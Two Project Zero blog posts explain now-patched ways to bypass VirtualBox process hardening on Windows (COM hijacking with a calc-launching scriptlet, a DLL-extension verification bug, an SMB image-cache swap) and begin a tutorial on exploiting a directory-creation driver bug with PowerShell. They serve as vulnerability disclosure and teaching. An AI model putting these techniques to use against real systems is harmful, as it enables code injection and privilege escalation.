Google Project Zero

Subscribe to Google Project Zero feed
News and updates from the Project Zero team at Googletavisohttp://www.blogger.com/profile/00625649251729449405noreply@blogger.comBlogger74125
Updated: 2 hours 40 min ago

Bypassing VirtualBox Process Hardening on Windows

Wed, 08/23/2017 - 12:10
Posted by James Forshaw, Project Zero
Processes on Windows are securable objects, which prevents one user logged into a Windows machine from compromising another user’s processes. This is a pretty important security feature, at least from the perspective of a non-administrator user. The security prevents a non-administrator user from compromising the integrity of an arbitrary process. This security barrier breaks down when trying to protect against administrators, specifically administrators with Debug privilege, as enabling this privilege allows the administrator to open any process regardless of the security applied to it.
There are cases where applications or the operating system want to actively defend processes from users such as administrators or even, in some cases, the same user as the running process who’d normally have full access. Protecting the processes is a pretty hard challenge if done entirely from user mode applications. Therefore many solutions use kernel support to perform the protection. In the majority of cases these sorts of techniques still have flaws, which we can exploit to compromise the “protected” process.
This blog post will describe the implementation of Oracle’s VirtualBox protected process and detail three different, but now fixed, ways of bypassing the protection and injecting arbitrary code into the process. The techniques I’ll present can equally be applied to similar implementations of “protected” processes in other applications.Oracle VirtualBox Process HardeningProtecting processes entirely in user mode is pretty much impossible, there are just too many ways of injecting content into a process. This is especially true when the process you’re trying to protect is running under the same context as the user you’re trying to block. An attacker could, for example, open a handle to the process with PROCESS_CREATE_THREAD access and directly inject a new thread. Or they could open a thread in the process with THREAD_SET_CONTEXT access and directly change the Instruction Pointer to jump to an arbitrary location. These are just the direct attacks. The attacker could also modify the registry or environment the process is running under, then force the process to load arbitrary COM objects, or Windows Hooks. The list of possible modifications is almost endless.
Therefore, VirtualBox (VBOX) enlists the help of the kernel to try to protect its processes. The source code refers to this as Process Hardening. VBOX tries to protect the processes from the same user the process is running under. A detailed rationale and technical overview is provided in source code comments. The TL;DR; is the protection gates access to the VBOX kernel drivers, which due to design have a number of methods which can be used to compromise the kernel, or at least elevate privileges. This is why VBOX tries to prevent the current user compromising the process, getting access to the VBOX kernel driver would be a route to Kernel or System privileges. As we’ll see though while some protections also prevent administrators compromising the processes that’s not the aim of the hardening code.
Multiple examples of issues with the driver and protection from device access were discovered by my colleague Jann in VBOX on Linux. On Linux, VBOX limits access to the VBOX driver to root only, and uses SUID binaries to allow the VBOX user processes to get access to the driver before dropping privileges. On Windows instead of SUID binaries the VBOX driver uses kernel APIs to try to stop users and administrators opening protected processes and injecting code.
The core of the kernel component is in the Support\win\SUPDrv-win.cpp file. This code registers with two callback mechanisms supported by modern Windows kernels:
  1. PsSetCreateProcessNotifyRoutineEx - Driver is notified when a new process is created.
  2. ObRegisterCallback - Driver is notified when Process and Thread handles are created or duplicated.
The notification from PsSetCreateProcessNotifyRoutineEx is used to configure the protection structures for a new process. When the process subsequently tries to open a handle to the VBOX driver the hardening will only permit access after the following verification steps are performed in the call to supHardenedWinVerifyProcess:
  1. Ensure there are no debuggers attached to the process.
  2. Ensure there is only a single thread in the process, which should be the one opening the driver to prevent in-process races.
  3. Ensure there are no executable memory pages outside of a small set of permitted DLLs.
  4. Verify the signatures of all loaded DLLs.
  5. Check the main executable’s signature and that it is of a permitted type of executable (e.g. VirtualBox.exe).

Signature verification in the kernel is done using custom runtime code compiled into the driver. Only a limited set of Trusted Roots are permitted to be verified at this step, primarily Microsoft’s OS and Authenticode certificates as well as the Oracle certificate that all VBOX binaries are signed with. You can find the list of permitted certificates in the source repository.
The ObRegisterCallback notification is used to limit the maximum access any other user process on the system can be granted to the protected process. The ObRegisterCallback API was designed for Anti-Virus to protect processes from being injected into or terminated by malicious code. VBOX uses a similar approach and limits any handle to the protected process to the following access rights:
  • PROCESS_TERMINATE
  • PROCESS_VM_READ
  • PROCESS_QUERY_INFORMATION
  • PROCESS_QUERY_LIMITED_INFORMATION
  • PROCESS_SUSPEND_RESUME
  • DELETE
  • READ_CONTROL
  • SYNCHRONIZE

The permitted access rights give the user most of the typical rights they’d expect, such as being able to read memory, synchronize to the process and terminate it but does not allow injecting new code into the process. Similarly, access to threads is restricted to the following access rights to prevent modification of a thread’s context or similar attacks.
  • THREAD_TERMINATE
  • THREAD_GET_CONTEXT
  • THREAD_QUERY_INFORMATION
  • THREAD_QUERY_LIMITED_INFORMATION
  • DELETE
  • READ_CONTROL
  • SYNCHRONIZE

We can verify this access limitation by opening the VirtualBox process and one of its threads and see what access rights we’re granted. For example the following picture highlights the process and thread granted access.

While the kernel callbacks prevent direct modification of the process as well as a user trying to compromise the integrity of the process at startup they do very little against runtime DLL injection such as through COM. The hardening implementation needs to decide on what modules it’ll allow to be loaded into the process. The decision, fundamentally, is based on Authenticode code signing.
There are mitigation options to enable loading only Microsoft signed binaries (such as PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY). However, this policy isn’t very flexible. Therefore, protected VBOX processes install hooks to a couple of internal functions in user-mode to verify the integrity of any DLL which is being loaded into memory. The hooked functions are:
  1. LdrLoadDll - Called to load a DLL into memory.
  2. NtCreateSection - Called to create an Image Section object for a PE file on disk.
  3. LdrRegisterDllNotification - This is a quasi-officially supported callback which notifies the application when a new DLL is loaded or unloaded.

These hooks expand the permitted set of signed DLLs which can be loaded. The kernel signature verification is okay for bootstrapping the process as only Oracle and Microsoft code should be present. However, when it comes to running a non-trivial application ( VirtualBox.exe is certainly non-trivial) you’re likely to need to load third-party signed code such as GPU drivers. As the hooks are in user mode it’s easier to call the system WinVerifyTrust API which will verify certificate chains using the system certificate stores as well as handling the verification of files signed in a Catalog file.
If the DLL being loaded doesn’t meet VBOX’s expected criteria for signing then the user-mode hooks will reject loading that DLL. VBOX still doesn't completely trust the user; WinVerifyTrust will chain certificates back to a root certificate in the user’s CA certificates. However, VBOX will only trust system CA certificates. As a non-administrator cannot add a new trusted root certificate to the system’s list of CA certificates this should severely limit the injection of malicious DLLs.
You can get a real code signing certificate which should also be trusted, but the assumption is malicious code wouldn’t want to go down that route. Even if the code is signed the loader also checks that the DLL file is owned by the TrustedInstaller user. This is checked in supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar. A normal user should not be able to change the owner of a file to anything but themselves, therefore it should limit the impact of the behavior to allow any signed file to load.
The VBOX code does have a function which is supposed to restrict what certificates are permitted supR3HardenedWinIsDesiredRootCA as roots. In official builds the function’s whitelist of specific CAs is commented out. There’s a blacklist of certificates, however, unless your company is called “U.S. Robots and Mechanical Men, Inc” the blacklist won’t affect you.
Even with all this protection the process isn’t secure against an administrator. While an administrator can’t bypass the security on opening the process, they can install a local machine Trusted Root CA certificate and sign a DLL, set its owner and force it to be loaded. This will bypass the image verification and load into the verified VBOX process.
In summary the VBOX hardening is attempting to provide the following protections:
  1. Ensure that no code is injected into protected binaries during initialization.
  2. Prevent user processes from opening “writable” handles to protected processes or threads which would allow arbitrary code injection.
  3. Prevent injection of untrusted DLLs through normal loading routes such as COM.

This whole process is likely to have some bugs and edge cases. There’s so many different verification checks which must all fit together. So, assuming we don’t want to get a code signing certificate and we don’t have administrator rights how can we get arbitrary code running inside a protected VBOX process? We’ll focus primarily on the third protection in the list, as this is perhaps the most complex part of the protection and therefore is likely to have the most issues.Exploiting the Chain-of-Trust in COM RegistrationThe first bug I’m going to describe was fixed as CVE-2017-3563 in VBOX version 5.0.38/5.1.20. This issue exploits the chain-of-trust for DLL loading to trick VBOX into loading Microsoft signed DLLs which just happen to allow untrusted arbitrary code execution.
If you run Process Monitor against the protected VBOX process you’ll notice that it uses COM, specifically it uses the VirtualBoxClient class which is implemented in the VBoxC.dll COM server.

The nice thing about COM server registration, at least from the perspective of an attacker, is the registration for a COM object can be in one of two places, the user’s registry hive, or the local machine registry hive. For reasons of compatibility the user’s hive is checked first, before falling back to the local machine hive. Therefore it’s possible to override a COM registration with a normal user’s permission, so when an application tries to load the designated COM object the application will instead load whatever DLL we’ve overridden it with.
Hijacking COM objects is not a new technique, it’s been known for many years especially for the purposes of Malware persistence. It’s seen a resurgence of late because of the renewed interest in all things COM. However, it’s rare that COM hijacking is of importance for elevation of privilege outside of UAC bypasses.
As an aside, the connection between UAC and COM hijacking is the COM runtime actively tries to prevent the hijack being used as an EoP route by disabling certain User registry lookups if the current process is elevated. Of course it wasn’t always successful. This behavior only makes sense if you view UAC through the prism of it being a defendable security boundary, which Microsoft categorically claim it’s not and never was. For example this blog post from early 2007 specifically states this behavior is to prevent Elevation of Privilege. I think the COM lookup behavior is one of the clearest indicators that UAC was originally designed to be a security boundary. It failed to meet the security bar and so was famously retconned into helping “developers” write better code.
If we could replace the COM registration with our own code we should be able to get code execution inside the hardened process. In theory all the hardening signing checks should stop us from loading untrusted code. In research, it’s always worth trying something which you believe should fail just in case as sometimes you get a nice surprise. At minimum it’ll give you insight into how the protection really works. I registered a COM object to hijack the VirtualBoxClient class in the user’s hive and pointed it at an unsigned DLL (Full Disclosure, I used an admin account to tweak the Owner to TrustedInstaller just to test). When I tried to start a Virtual Machine I got the following dialog.

It’s possible that I just made a mistake in the COM registration, however testing the COM object in a separate application worked as expected. Therefore this error is likely a result of failing to load the DLL. Fortunately, VBOX is generous and enables by default a log of all Process Hardening events. It’s named VBoxHardening.log and is located in the Logs folder in the Virtual Machine you tried to start. Searching for the name of the DLL we find the following entries (heavily modified for brevity):
supHardenedWinVerifyImageByHandle: -> -22900 (c:\dummy\testdll.dll) supR3HardenedScreenImage/LdrLoadDll: c:\dummy\testdll.dll: Not signed.supR3HardenedMonitor_LdrLoadDll: rejecting 'c:\dummy\testdll.dll'supR3HardenedMonitor_LdrLoadDll: returns rcNt=0xc0000190
So clearly our test DLL isn’t signed and so the LdrLoadDll hook rejects it. The LdrLoadDll hook returns an error code which propagates back up to the COM DLL loader, which results in COM thinking the class doesn’t exist.
While it’s not surprising that it wasn’t as simple as just specifying our own DLL (and don’t forget we cheated with setting the Owner) it at least gives us hope as this result means the VBOX process will use our hijacked COM registration. All we need therefore is a COM object which meets the following criteria:
  1. It’s signed by a trusted certificate.
  2. It’s owned by TrustedInstaller.
  3. When loaded will do something that allows for arbitrary code execution in the process.

Criteria 1 and 2 are easy to meet, any Microsoft COM object on the system is signed by a trusted certificate (one of Microsoft’s publisher certificates) and is almost certainly owned by TrustedInstaller. However, criteria 3 would seem much more difficult to meet, a COM object is usually implemented inside the DLL and we can’t modify the DLL itself, otherwise it would no longer be signed. It just so happens that there is a Microsoft signed COM object installed by default which will allow us to meet criteria 3, Windows Script Components (WSC).
WSC, also sometimes called Scriptlets are also having a good run at the moment. They can be used as an AppLocker bypass as well as being loaded from HTTP URLs. What’s of most interest in this case is they can also be registered as a COM object.
A registered WSC consists of two parts:
  1. The WSC runtime scrobj.dll which acts as the in-process COM server.
  2. A file which contains the implementation of the Scriptlet in a compatible scripting language.

When an application tries to load the registered class scrobj.dll gets loaded into memory. The COM runtime requests a new object of the required class which causes the WSC runtime to go back to the registry to lookup the URL to the implementation Scriptlet file. The WSC runtime then loads the Scriptlet file and executes the embedded script contained in the file in-process. The key here is that as long as scrobj.dll (and any associated script language libraries such as JScript.dll) are valid signed DLLs from VBOX’s perspective then the script code will run as it can never be checked by the hardening code. This would get arbitrary code running inside the hardened process. First let’s check that scrobj.dll is likely to be allowed to be loaded by VBOX. The following screenshot shows the DLL is both signed by Microsoft and is also owned by TrustedInstaller.

So what does a valid Scriptlet file look like? It’s a simple XML file, I’m not going to go into much detail about what each XML element means, other than to point out the script block which will execute arbitrary JScript code. In this case all this Scriptlet will do when loaded is start the Calculator process.
<scriptlet>
 <registration
   description ="Component"
   progid="Component"
   version="1.00"
   classid="{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}"
 />
 <public/>
 <script language = "JScript" >
 <![CDATA[
 new ActiveXObject('WScript.Shell').Exec('calc');
 ]]>
 </script>
</scriptlet>
If you’re written much code in JScript or VBScript you might now notice a problem, these languages can’t do that much unless it’s implemented by a COM object. In the example Scriptlet file we can’t create a new process without loading the WScript.Shell COM object and calling its Exec method. In order to talk to the VBOX driver, which is whole purpose of injecting code in the first place, we’d need a COM object which gives us that functionality. We can’t implement the code in another COM object as that wouldn’t pass the image signing checks we’re trying to bypass. Of course, there’s always memory corruption bugs in scripting engines but, as everyone already knows by now, I’m not a fan of exploiting memory corruptions so we need some other way of getting fully arbitrary code execution. Time to bring in the big guns, the .NET Framework.
The .NET runtime loads code into memory using the normal DLL loading routines. We can’t therefore load a .NET DLL which isn’t signed into memory as that would still get caught by VBOX’s hardening code. However, .NET does support loading arbitrary code from an in-memory array using the Assembly::Load method and once loaded this code can basically act as if it was native code, calling arbitrary APIs and inspecting/modifying memory. As the .NET framework is signed by Microsoft all we need to do is somehow call the Load method from our Scriptlet file and we can get full arbitrary code running inside the process.
Where do we even start on achieving this goal? From a previous blog post it’s possible to expose .NET objects as COM objects through registration and by abusing Binary Serialization we can load arbitrary code from a byte array. Many core .NET runtime classes are automatically registered as COM objects which can be loaded and manipulated by a scripting engine. The big question can now be asked, is BinaryFormatter exposed as a COM object?

Why, yes it is. BinaryFormatter is a .NET object that a scripting engine can load and interact with via COM. We could now take the final binary stream from my previous post and execute arbitrary code from memory. In the previous blog post the execution of the untrusted code had to occur during deserialization, in this case we can interact with the results of deserialization in a script which can make the serialization gadgets we need much simpler.
In the end I chose to deserialize a Delegate object which when executed by the script engine would load an Assembly from memory and return the Assembly instance. The script engine could then instantiate an instance of a Type in that Assembly and run arbitrary code. It does sound simple in principle, in reality there are a number of caveats. Rather than bog down this blog post with more detail than necessary the tool I used to generate the Scriptlet file, DotNetToJScript is available so you can read how it works yourself. Also the PoC is available on the issue tracker here. The chain from the JScript component to being able to call the VBOX driver looks something like the following:


I’m not going to go into what you can now do with the VBOX driver once you’ve got arbitrary code running the hardened process, that’s certainly a topic for another post. Although you might want to look at one of Jann’s issues which describes what you might do on Linux.
How did Oracle fix the issue? They added a blacklist of DLLs which are not allowed to be loaded by the hardened VBOX process. The only DLL currently in that list is scrobj.dll. The list is checked after the verification of the file has taken place and covers both the current filename as well as the internal Original Filename in the version resources. This prevents you just renaming the file to something else, as the version resources are part of the signed PE data and so cannot be modified without invalidating the signature. In fairness to Oracle I’m not sure there was any other sensible way of blocking this attack vector other than a DLL blacklist.Exploiting User-Mode DLL Loading Behavior The second bug I’m going to describe was fixed as CVE-2017-10204 in VBOX version 5.1.24. This issue exploits the behavior of the Windows DLL loader and some bugs in VBOX to trick the hardening code to allow an unverified DLL to be loaded into memory and executed.
While this bug doesn’t rely on exploiting COM loading as such, the per-user COM registration is a convenient technique to get LoadLibrary called with an arbitrary path. Therefore we’ll continue to use the technique of hijacking the VirtualBoxClient COM object and just use the in-process server path as a means to load the DLL.
LoadLibrary is an API with a number of well known, but strange behaviors. One of the more interesting from our perspective is the behavior with filename extensions. Depending on the extension the LoadLibrary API might add or remove the extension before trying to load the file. I can summarise it in a table, showing the file name as passed to LoadLibrary and the file it actually tries to load.
Original File NameLoaded File Namec:\test\abc.dllc:\test\abc.dllc:\test\abcc:\test\abc.dllc:\test\abc.blahc:\test\abc.blahc:\test\abc.c:\test\abc
I’ve highlighted in green the two important cases. These are the cases where the filename passed into LoadLibrary doesn’t match the filename which eventually gets loaded. The problem for any code trying to verify a DLL file before loading it is CreateFile doesn’t follow these rules so in the highlighted cases if you opened the file for signature verification using the original file name you’d verify a different file to the one which eventually gets loaded.
In Windows there’s usually a clear separation between Kernel32 code, which tends to deal with the many weird behaviors Win32 has built up over the years and the “clean” NT layer exposed by the kernel through NTDLL. Therefore as LoadLibrary is in Kernel32 and LdrLoadDll (which is the function the hardening hooks) is in NTDLL then this weird extension behavior would be handled in the former. Let’s look at a very simplified version of LoadLibrary to see if that’s the case:
HMODULE LoadLibrary(LPCWSTR lpLibFileName)
{
 UNICODE_STRING DllPath;
 HMODULE ModuleHandle;
 ULONG Flags = // Flags;

 RtlInitUnicodeString(&DllPath, lpLibFileName);  
 if (NT_SUCCESS(LdrLoadDll(DEFAULT_SEARCH_PATH,
     &Flags, &DllPath, &ModuleHandle))) {
   return ModuleHandle;
 }
 return NULL;
}
We can see in this code that for all intents and purposes LoadLibrary is just a wrapper around LdrLoadDll. While it’s really more complex than that in reality the takeaway is that LoadLibrary does not modify the path it passes to LdrLoadDll in any way other than converting it to a UNICODE_STRING. Therefore perhaps if we specify a DLL to load without an extension VBOX will check the extension-less file for the signature but LdrLoadDll will instead load the file with the .DLL extension.
Before we can test that we’ve got another problem to deal with, the requirement that the file is owned by TrustedInstaller. For the file we want VBOX to signature check all we need to do is give an existing valid, signed file a different filename. This is what hard links were created for; we can create a different name in a directory we control which actually links to a system file which is signed and also maintains its original security descriptor including the owner. The trouble with hard links is, as I described almost 2 years ago in a blog post, while Windows supports creating links to system files you can’t write to, the Win32 APIs, and by extension the easy to access “mklink” command in the CMD shell require the file be opened with FILE_WRITE_ATTRIBUTES access. Instead of using another application to create the link we’ll just copy the file, however the copy will no longer have the original security descriptor and so it’ll no longer be owned by TrustedInstaller. To get around that let’s look at the checking code to see if there’s a way around it.
The main check for the Owner is in supHardenedWinVerifyImageByLdrMod. Almost the first thing that function does is call supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar which we saw earlier. However as the comments above the check indicate the code will also allow files under System32 and WinSxS directories to not be owned by TrustedInstaller. This is a bus sized hole in the point of the check, as all we need is one writeable directory under System32. We can find some by running the Get-AccessibleFile cmdlet in my NtObjectManager PS module.

There are plenty to choose from, we’ll just pick the Tasks folder as it’s guaranteed to always be there. So the exploit should be as follows:
  1. Copy a signed binary to %SystemRoot%\System32\Tasks\Dummy\ABC
  2. Copy an unsigned binary to %SystemRoot%\System32\Tasks\Dummy\ABC.DLL
  3. Register a COM hijack pointing the in-process server to the signed file path from 1.

If you try to start a Virtual Machine you’ll find that this trick works. The hardening code checks the ABC file for the signature, but LdrLoadDll ends up loading ABC.DLL. Just to check we didn’t just exploit something else let’s check the hardening log:
\..\Tasks\dummy\ABC: Owner is not trusted installer\..\Tasks\dummy\ABC: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
supHardenedWinVerifyImageByHandle: -> 0 (\..\Tasks\dummy\ABC)supR3HardenedMonitor_LdrLoadDll: pName=c:\..\tasks\dummy\ABC [calling]
The first two lines indicate the bypass of the Owner check as we expected. The second two indicate it’s verified the ABC file and therefore will call the original LdrLoadDll, which ultimately will append the extension and try to load ABC.DLL instead. But, wait, how come the other checks in NtCreateSection and the loader callback don’t catch loading a completely different file? Let’s search for any instance of ABC.DLL in the rest of the hardening log to find out:
\..\Tasks\dummy\ABC.dll: Owner is not trusted installer \..\Tasks\dummy\ABC.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).supHardenedWinVerifyImageByHandle: -> 22900 (\..\Tasks\dummy\ABC.dll)supR3HardenedWinVerifyCacheInsert: \..\Tasks\dummy\ABC.dllsupR3HardenedDllNotificationCallback:  c:\..\tasks\dummy\ABC.DLL supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900) on \...\Tasks\dummy\ABC.dll
Again the first two lines indicate we bypassed the Owner check because of our file's location. The next line, supHardenedWinVerifyImageByHandle is more interesting however. This function verifies the image file. If you look back in this blog at the earlier log of this check you’ll find it returned the result -22900, which was considered an error. However in this case it’s returning 22900, which as VBOX is treating any result >= 0 as success the hardening code gets confused and assumes that the file is valid. The negative error code is VERR_LDRVI_NOT_SIGNED in the source code, whereas the positive “success” code is VINF_LDRVI_NOT_SIGNED.
This seems to be a bug in the verification code when calling code in the DLL Loader Lock, such as in the NtCreateSection hook. The code can’t call WinVerifyTrust in case it tries to load another DLL, which would cause a deadlock. What would normally happen is VINF_LDRVI_NOT_SIGNED is returned from the internal signature checking implementation. That implementation can only handle files with embedded signatures, so if a file isn’t signed it returns that information code to get the verification code to check if the file is catalog signed. What’s supposed to happen is WinVerifyTrust is called and if the file is still not signed it returns the error code, however as WinVerifyTrust can’t be called due to the lock the information code gets propagated to the caller which assumed it’s a success code.
The final question is why the final Loader Callback doesn’t catch the unsigned file? VBOX implements a signed file cache based on the path to avoid checking a file multiple times. When the call to supHardenedWinVerifyImageByHandle was taken to be a success the verifier called supR3HardenedWinVerifyCacheInsert to add a cache entry for this path with the “success” code. We can see that in the Loader Callback it tries to verify the file but gets back a “success” code from the cache so assumes everything's okay, and the loading process is allowed to complete.
Quite a complex set of interactions to get code running. How did Oracle fix this issue? They just add the DLL extension if there’s no extension present. They also handle the case where the filename has a trailing period (which would be removed when loading the DLL).Exploiting Kernel-Mode Image Loading BehaviorThe final bug I’m going to describe was fixed as CVE-2017-10129 in VBOX version 5.1.24. This isn’t really a bug in VBOX as much as it’s an unexpected behavior in Windows.
Through all this it’s worth noting that there’s an implicit race condition in what the hardening code is trying to do, specifically if you could change the file between the verification point and the point where the file is mapped. In theory you could do this to VBOX but the timing window is somewhat short. You could use OPLOCKs and the like but it’s a bit of a pain, instead it’d be nice to get the TOCTOU attack for free.
Let’s look at how image files are handled in the kernel. Mapping an image file on Windows is expensive, the OS doesn’t use position independent code and so can’t just map the DLL into memory as a simple file. Instead the DLL must be relocated to a specific memory address. This requires modifying pages of the DLL file to ensure any pointers are correctly fixed up. This is even more important when you bring ASLR into the mix as ASLR will almost always force a DLL to be relocated from its base address. Therefore, Windows caches an instance of an image mapping whenever it can, this is why the load address of a DLL doesn’t change between processes on the same system, it’s using the same cached image section.
The caching is actually in part under control of the filesystem driver. When a file is opened the IO manager will allocate a new instance of the FILE_OBJECT structure and pass it to the IRP_MJ_CREATE handler for the driver. One of the fields that the driver can then initialize is the SectionObjectPointer. This is an instance of the SECTION_OBJECT_POINTERS structure, which looks like the following:
struct SECTION_OBJECT_POINTERS {
 PVOID DataSectionObject;
 PVOID SharedCacheMap;
 PVOID ImageSectionObject;
};
The fields themselves are managed by the Cache manager, but the structure itself must be allocated by the File System driver. Specifically the allocation should be one per-file in the filesystem; while each open instance of a specific file will have unique FILE_OBJECT instances the SectionObjectPointer should be the same. This allows the Cache manager to fill in the different fields and then reuse them if another instance of the same file tries to be mapped.
The important field here is ImageSectionObject which contains the cached data for the mapped image section. I’m not going to delve into detail of what the ImageSectionObject pointer contains as it’s not really relevant. The important thing is if the SectionObjectPointer and by extension the ImageSectionObject pointers are the same for a FILE_OBJECT instance then mapping that file as an image will map the same cached image mapping. However, as ImageSectionObject pointer is not used when reading from a file it doesn’t follow that what’s actually cached still matches what’s on disk.
Trying to desynchronize the file data from the SectionObjectPointer seems to be pretty tricky with an NTFS volume, at least without administrator privileges. One scenario where you can do this desynchronization is via the SMB redirector when accessing network shares. The reason is pretty simple, it’s the local redirector’s responsibility to allocate the SectionObjectPointer structure when a file is opened on a remote server. As far as the the redirector’s concerned if it opens the file \Share\File.dll on a server twice then it’s the same file. There’s no real other information the redirector can use to verify the identity of the file, it has to guess. Any property you can think of, Object ID, Modification Time can just be a lie. You could easily modify a copy of SAMBA to do this lying for you. The redirector also can’t lock the file and ensure it stays locked. So it seems the redirector just doesn’t bother with any of it, if it looks like the same file from its perspective it assumes it’s fine.
However this is only for the SectionObjectPointer, if the caller wants to read the contents of the file the SMB redirector will go out to the server and try to read the current state of the file. Again this could all be lies, and the server could return any data it likes. This is how we can create a desynchronization; if we map an image file from a SMB server, change the underlying file data then reopen the file and map the image again the mapped image will be the cached one, but any data read from the file will be what’s current on the server. This way we can map an untrusted DLL first, then replace the file data with a signed, valid file (SMB supports reading the owner of the file, so we can spoof TrustedInstaller), when VBOX tries to load it it will verify the signed file but map the cached untrusted image and it will never know.
Having a remote server isn’t ideal, however we can do everything we need by using the local loopback SMB server and access files via the admin shares. Contrary to their names admin shares are not limited to administrators if you’re coming from localhost. The key to getting this to work is to use a Directory Junction. Junctions are resolved on the server, the redirector client knows nothing about them. Therefore as far as the client is concerned if it opens the file \\localhost\c$\Dir\File.dll once, then reopens the same file these could be two completely different files as shown in the following diagram:

Fortunately, one thing which should be evident from the previous two issues is that VBOX’s hardening code doesn’t really care where the DLL is located as long as it meets its two criteria, it’s owned by TrustedInstaller and it’s signed. We can point the COM hijack to a SMB share on the local system. Therefore we can perform the attack as follows:
  1. Set up a junction on the C: drive pointing at a directory containing our untrusted file.
  2. Map the file via the junction over the c$ admin share using LoadLibrary, do not release the mapping until the exploit is complete.
  3. Change the junction to point to another directory with a valid, signed file with the same name as our untrusted file.
  4. Start VBOX with the COM hijack pointing at the file. VBOX will read the file and verify it’s signed and owned by TrustedInstaller, however when it maps it the cached, untrusted image section will be used instead.

So how did Oracle fix this? They now check that the mapped file isn’t on a network share by comparing the path against the prefix \Device\Mup. Conclusions
The implementation of process hardening in VirtualBox is complex and because of that it is quite error prone. I’m sure there are other ways of bypassing the protection, it just requires people to go looking. Of course none of this would be necessary if they didn’t need to protect access to the VirtualBox kernel driver from malicious use, but that’s a design decision that’s probably going to be difficult to fix in the short term.
Categories: Security

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

Tue, 08/08/2017 - 12:17
Posted by James Forshaw, Project Zero
For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.
In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist - for example, here’s one that was in the Linux subsystem - but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.
For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.Quick Background on the Vulnerability ClassWhen dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.
A very simple vulnerable example you might see in a kernel driver looks like the following:
NTSTATUS KernelCreateDirectory(PHANDLE Handle,                               PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);
 
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,                      &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,                     FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}
There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.
Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately. Creating an Arbitrary DirectoryIf you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there. Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.
Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new("Unknown",`
       0x800 -bor $ControlCode, "Buffered", "Any")
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl -ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}
The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.

